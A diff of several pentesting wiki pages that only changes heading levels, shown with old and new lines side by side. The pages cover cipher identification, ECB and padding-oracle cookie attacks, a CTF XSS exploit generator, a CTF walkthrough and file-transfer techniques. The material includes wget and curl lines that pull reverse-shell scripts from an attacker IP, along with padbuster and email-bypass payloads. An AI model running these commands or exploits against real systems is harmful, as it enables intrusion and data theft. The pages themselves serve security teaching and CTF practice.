* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) * [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
### BinHex ## BinHex
``` ```
(This file must be converted with BinHex 4.0) (This file must be converted with BinHex 4.0)
@ -192,7 +190,7 @@ ryvkryvkryvkryvkryvkryvkryvk
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85 ## ASCII85
``` ```
<~85DoF85DoF85DoF85DoF85DoF85DoF~> <~85DoF85DoF85DoF85DoF85DoF85DoF~>
@ -200,7 +198,7 @@ ryvkryvkryvkryvkryvkryvkryvk
* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) * [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
### Dvorak keyboard ## Dvorak keyboard
``` ```
drnajapajrna drnajapajrna
@ -208,7 +206,7 @@ drnajapajrna
* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) * [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard)
### A1Z26 ## A1Z26
Letters to their numerical value Letters to their numerical value
@ -216,7 +214,7 @@ Letters to their numerical value
8 15 12 1 3 1 18 1 3 15 12 1 8 15 12 1 3 1 18 1 3 15 12 1
``` ```
### Affine Cipher Encode ## Affine Cipher Encode
Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter
@ -224,7 +222,7 @@ Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and t
krodfdudfrod krodfdudfrod
``` ```
### SMS Code ## SMS Code
**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\ **Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
For example: 2=A, 22=B, 222=C, 3=D...\ For example: 2=A, 22=B, 222=C, 3=D...\
@ -232,7 +230,7 @@ You can identify this code because you will see** several numbers repeated**.
You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
### Bacon Code ## Bacon Code
Substitude each letter for 4 As or Bs (or 1s and 0s) Substitude each letter for 4 As or Bs (or 1s and 0s)
@ -241,21 +239,21 @@ Substitude each letter for 4 As or Bs (or 1s and 0s)
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
``` ```
### Runes ## Runes
![](../.gitbook/assets/runes.jpg) ![](../.gitbook/assets/runes.jpg)
## Compression # Compression
**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers. **Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
## Easy Crypto # Easy Crypto
### XOR - Autosolver ## XOR - Autosolver
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
### Bifid ## Bifid
A keywork is needed A keywork is needed
@ -263,7 +261,7 @@ A keywork is needed
fgaargaamnlunesuneoa fgaargaamnlunesuneoa
``` ```
### Vigenere ## Vigenere
A keywork is needed A keywork is needed
@ -275,9 +273,9 @@ wodsyoidrods
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) * [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) * [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
## Strong Crypto # Strong Crypto
### Fernet ## Fernet
2 base64 strings (token and key) 2 base64 strings (token and key)
@ -291,7 +289,7 @@ Key:
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
### Samir Secret Sharing ## Samir Secret Sharing
A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
@ -303,12 +301,12 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
### OpenSSL brute-force ## OpenSSL brute-force
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
* [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF) * [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
## Tools # Tools
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Electronic Code Book (ECB) # ECB
## ECB
(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. (ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key.
@ -30,7 +28,7 @@ Using ECB has multiple security implications:
* **Blocks from encrypted message can be removed** * **Blocks from encrypted message can be removed**
* **Blocks from encrypted message can be moved around** * **Blocks from encrypted message can be moved around**
## Detection of the vulnerability # Detection of the vulnerability
Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`<username>|<password>`**.\ Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`<username>|<password>`**.\
Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\
@ -56,9 +54,9 @@ Now, the attacker just need to discover if the format is `<username><delimiter><
| 4 | 4 | 8 | 16 | | 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 | | 7 | 7 | 14 | 16 |
## Exploitation of the vulnerability # Exploitation of the vulnerability
### Removing entire blocks ## Removing entire blocks
Knowing the format of the cookie (`<username>|<password>`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: Knowing the format of the cookie (`<username>|<password>`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
@ -73,7 +71,7 @@ Then, you can remove the first block of 8B and you will et a valid cookie for th
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
``` ```
### Moving blocks ## Moving blocks
In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_
@ -86,7 +84,7 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the
** Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** ** Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`**
## References # References
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Hash Length Extension Attack # Summary of the attack
## Summary of the attack
Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
@ -32,7 +30,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**. Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
### How? ## How?
Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**. Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
@ -44,11 +42,11 @@ If an attacker wants to append the string "append" he can:
* Append the string "append" * Append the string "append"
* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** * Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
### **Tool** ## **Tool**
{% embed url="https://github.com/iagox86/hash_extender" %} {% embed url="https://github.com/iagox86/hash_extender" %}
## References # References
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Padding Oracle # CBC - Cipher Block Chaining
## CBC - Cipher Block Chaining
In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
@ -31,7 +29,7 @@ To decrypt CBC the **opposite** **operations** are done:
Notice how it's needed to use an **encryption** **key** and an **IV**. Notice how it's needed to use an **encryption** **key** and an **IV**.
## Message Padding # Message Padding
As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\ As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`. Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
@ -47,13 +45,13 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
Note how in the last example the **last block was full so another one was generated only with padding**. Note how in the last example the **last block was full so another one was generated only with padding**.
## Padding Oracle # Padding Oracle
When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**. When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
### How to exploit ## How to exploit
You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
@ -81,7 +79,7 @@ If the site is vulnerable `padbuster`will automatically try to find when the pad
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
``` ```
### The theory ## The theory
In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**. In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
@ -110,7 +108,7 @@ Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**Follow this chain until you decrypt the whole encrypted text.** **Follow this chain until you decrypt the whole encrypted text.**
### Detection of the vulnerability ## Detection of the vulnerability
Register and account and log in with this account .\ Register and account and log in with this account .\
If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t. If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t.
@ -118,7 +116,7 @@ If you **log in many times** and always get the **same cookie**, there is probab
Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster.
## References # References
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# RC4 - Encrypt\&Decrypt
If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4(using the same password) just using the encryption function. If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4(using the same password) just using the encryption function.
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# CTF Write-ups
* [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\) * [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\)
* [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime * [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# challenge-0521.intigriti.io ## Brief Description <a href="brief-description" id="brief-description"></a>
### Brief Description <a href="brief-description" id="brief-description"></a>
The challenge provides a vulnerable to XSS form in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\ The challenge provides a vulnerable to XSS form in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\
This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io) via an iframe. This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io) via an iframe.
@ -28,7 +26,7 @@ It was found that the form will **insert the user input inside the JavaScript `e
However, before inserting the user input inside the`eval` function, its checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those character is found, the user input wont be executed inside `eval`.\ However, before inserting the user input inside the`eval` function, its checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those character is found, the user input wont be executed inside `eval`.\
Anyway, it was found a way to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function. Anyway, it was found a way to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function.
### Accessing the HTML <a href="accessing-the-html" id="accessing-the-html"></a> ## Accessing the HTML <a href="accessing-the-html" id="accessing-the-html"></a>
It was found that the letter `e` is permitted as user input. It was also found that there is an HTLM element using the `id="e"`. Therefore, this HtML element is accesible from Javascript just using the variable `e`:\ It was found that the letter `e` is permitted as user input. It was also found that there is an HTLM element using the `id="e"`. Therefore, this HtML element is accesible from Javascript just using the variable `e`:\
![](https://i.imgur.com/Slq2Xal.png) ![](https://i.imgur.com/Slq2Xal.png)
@ -53,7 +51,7 @@ Then, from the `e` HTML element its possible to access the `document` object
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"] e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]
``` ```
### Calling a function without parenthesis with JS code as string <a href="calling-a-function-without-parenthesis-with-js-code-as-string" id="calling-a-function-without-parenthesis-with-js-code-as-string"></a> ## Calling a function without parenthesis with JS code as string <a href="calling-a-function-without-parenthesis-with-js-code-as-string" id="calling-a-function-without-parenthesis-with-js-code-as-string"></a>
From the object `document` its possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\ From the object `document` its possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\
However, as the `()` characters are **forbidden**, its not possible to call the function using them. Anyway, its possible to call a function using **backtips** (\`\`).\ However, as the `()` characters are **forbidden**, its not possible to call the function using them. Anyway, its possible to call a function using **backtips** (\`\`).\
@ -71,7 +69,7 @@ e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]
You can test this code in a javascript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php) You can test this code in a javascript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php)
### Final forbidden characters bypass <a href="final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a> ## Final forbidden characters bypass <a href="final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a>
However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **not string characters in the exploit (e\[]\`${}) are allowed**.\ However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **not string characters in the exploit (e\[]\`${}) are allowed**.\
This means that if its possible to **generate the forbidden charaters as strings from the allowed characters**, its possible to generate the exploit.\ This means that if its possible to **generate the forbidden charaters as strings from the allowed characters**, its possible to generate the exploit.\
@ -85,7 +83,7 @@ Using these tricks and some more complex ones it was possible to **generate all
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}` e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}`
``` ```
### Exploit Code <a href="exploit-code" id="exploit-code"></a> ## Exploit Code <a href="exploit-code" id="exploit-code"></a>
This is the python exploit used to generate the final exploit. If you execute it, it will print the exploit: This is the python exploit used to generate the final exploit. If you execute it, it will print the exploit:
@ -158,7 +156,7 @@ txt = f'{document}[{write}]'+'`${['+payload+']}`'
print(txt) #Write the exploit to stdout print(txt) #Write the exploit to stdout
``` ```
### Exploitation <a href="exploitation" id="exploitation"></a> ## Exploitation <a href="exploitation" id="exploitation"></a>
In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here: In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here:

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Try Hack Me
<details> <details>

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# hc0n Christmas CTF - 2019
![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg) ![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
## Enumeration # Enumeration
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):

View file

@ -16,13 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Pickle Rick
![](../../.gitbook/assets/picklerick.gif) ![](../../.gitbook/assets/picklerick.gif)
This machine was categorised as easy and it was pretty easy. This machine was categorised as easy and it was pretty easy.
### Enumeration # Enumeration
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
@ -50,7 +49,7 @@ Checking the source code of the root page, a username is discovered: `R1ckRul3s`
Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub` Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub`
### User # User
Using those credentials you will access a portal where you can execute commands: Using those credentials you will access a portal where you can execute commands:
@ -72,7 +71,7 @@ The **second ingredient** can be found in `/home/rick`
![](<../../.gitbook/assets/image (240).png>) ![](<../../.gitbook/assets/image (240).png>)
### Root # Root
The user **www-data can execute anything as sudo**: The user **www-data can execute anything as sudo**:

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Emails Vulnerabilities # Payloads
## Payloads ## Ignored parts of an email
### Ignored parts of an email
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
@ -31,43 +29,43 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
* E.g. john.doe(intigriti)@example.com → john.doe@example.com * E.g. john.doe(intigriti)@example.com → john.doe@example.com
### Whitelist bypass ## Whitelist bypass
* inti(;inti@inti.io;)@whitelisted.com * inti(;inti@inti.io;)@whitelisted.com
* inti@inti.io(@whitelisted.com) * inti@inti.io(@whitelisted.com)
* inti+(@whitelisted.com;)@inti.io * inti+(@whitelisted.com;)@inti.io
### IPs ## IPs
You can also use IPs as domain named between square brackets: You can also use IPs as domain named between square brackets:
* john.doe@\[127.0.0.1] * john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1] * john.doe@\[IPv6:2001:db8::1]
### Other vulns ## Other vulns
![](<.gitbook/assets/image (296).png>) ![](<.gitbook/assets/image (296).png>)
## Third party SSO # Third party SSO
### XSS ## XSS
Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**. Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**.
### Account-Takeover ## Account-Takeover
If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\ If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._ _Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
## Reply-To # Reply-To
You can send an email using _**From: company.com**_** ** and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**. You can send an email using _**From: company.com**_** ** and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**.
## **References** # **References**
* [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view) * [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
## Hard Bounce Rate # Hard Bounce Rate
Some applications like AWS have a **Hard Bounce Rate** (in AWS is 10%), that whenever is overloaded the email service is blocked. Some applications like AWS have a **Hard Bounce Rate** (in AWS is 10%), that whenever is overloaded the email service is blocked.

View file

@ -17,27 +17,25 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Exfiltration # Copy\&Paste Base64
## Copy\&Paste Base64 ### Linux
#### Linux
```bash ```bash
base64 -w0 <file> #Encode file base64 -w0 <file> #Encode file
base64 -d file #Decode file base64 -d file #Decode file
``` ```
#### Windows ### Windows
``` ```
certutil -encode payload.dll payload.b64 certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll certutil -decode payload.b64 payload.dll
``` ```
## HTTP # HTTP
#### Linux ### Linux
```bash ```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
@ -46,7 +44,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD fetch 10.10.14.14:8000/shell.py #FreeBSD
``` ```
#### Windows ### Windows
```bash ```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@ -63,11 +61,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous Start-BitsTransfer -Source $url -Destination $output -Asynchronous
``` ```
### Upload files ## Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
### **HTTPS Server** ## **HTTPS Server**
```python ```python
# from https://gist.github.com/dergachev/7028596 # from https://gist.github.com/dergachev/7028596
@ -79,25 +77,25 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous
# then in your browser, visit: # then in your browser, visit:
# https://localhost:443 # https://localhost:443
#### PYTHON 2 ### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer import BaseHTTPServer, SimpleHTTPServer
import ssl import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever() httpd.serve_forever()
#### ###
#### PYTHON3 ### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler) httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True) httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever() httpd.serve_forever()
#### ###
#### USING FLASK ### USING FLASK
from flask import Flask, redirect, request from flask import Flask, redirect, request
from urllib.parse import quote from urllib.parse import quote
app = Flask(__name__) app = Flask(__name__)
@ -107,26 +105,26 @@ def root():
return "OK" return "OK"
if __name__ == "__main__": if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
#### ###
``` ```
## FTP # FTP
### FTP server (python) ## FTP server (python)
```bash ```bash
pip3 install pyftpdlib pip3 install pyftpdlib
python3 -m pyftpdlib -p 21 python3 -m pyftpdlib -p 21
``` ```
### FTP server (NodeJS) ## FTP server (NodeJS)
``` ```
sudo npm install -g ftp-srv --save sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp ftp-srv ftp://0.0.0.0:9876 --root /tmp
``` ```
### FTP server (pure-ftp) ## FTP server (pure-ftp)
```bash ```bash
apt-get update && apt-get install pure-ftp apt-get update && apt-get install pure-ftp
@ -146,7 +144,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart /etc/init.d/pure-ftpd restart
``` ```
### **Windows** client ## **Windows** client
```bash ```bash
#Work well with python. With pure-ftp use fusr:ftp #Work well with python. With pure-ftp use fusr:ftp
